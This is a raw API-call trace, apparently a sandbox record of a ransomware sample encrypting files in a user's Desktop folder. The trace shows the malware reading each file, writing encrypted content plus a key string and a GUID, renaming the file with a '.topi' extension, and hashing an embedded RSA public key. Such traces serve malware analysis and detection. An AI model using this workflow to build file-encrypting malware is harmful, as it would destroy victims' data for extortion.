RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.874] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96f0 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d96d8 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.875] GetCurrentThreadId () returned 0x8c4 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6f10 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.875] GetCurrentThreadId () returned 0x8c4 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9708 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.876] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.876] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96d8 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.877] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96f0 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96c0 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.877] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f22b0 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.878] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xdbb3, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xdbb3, lpOverlapped=0x0) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.878] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdbb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.878] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.878] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.878] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.879] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.879] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.879] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.879] CloseHandle (hObject=0x6a8) returned 1 [0095.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0095.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0095.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0095.891] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\J6NTjGWPf7Bn-3C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\j6ntjgwpf7bn-3c.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\J6NTjGWPf7Bn-3C.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\j6ntjgwpf7bn-3c.gif.topi")) returned 1 [0095.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.892] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.894] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5292070, ftCreationTime.dwHighDateTime=0x1d5bdfb, ftLastAccessTime.dwLowDateTime=0x716e6f90, ftLastAccessTime.dwHighDateTime=0x1d5b5a2, ftLastWriteTime.dwLowDateTime=0x716e6f90, ftLastWriteTime.dwHighDateTime=0x1d5b5a2, nFileSizeHigh=0x0, nFileSizeLow=0x13773, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MFSr.png", cAlternateFileName="")) returned 1 [0095.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3d30 [0095.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0095.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3d30 | out: hHeap=0x680000) returned 1 [0095.894] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\MFSr.png") returned=".png" [0095.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\MFSr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\mfsr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.894] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=79731) returned 1 [0095.894] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.898] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1374d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.898] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.899] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.899] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.900] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.900] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x13773, lpOverlapped=0x0) returned 1 [0095.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.900] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.900] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.901] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.902] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.902] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.902] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.902] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.902] GetLastError () returned 0x0 [0095.902] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.902] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.902] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.902] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.902] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.902] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x13770) returned 0x9a06a00 [0095.903] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 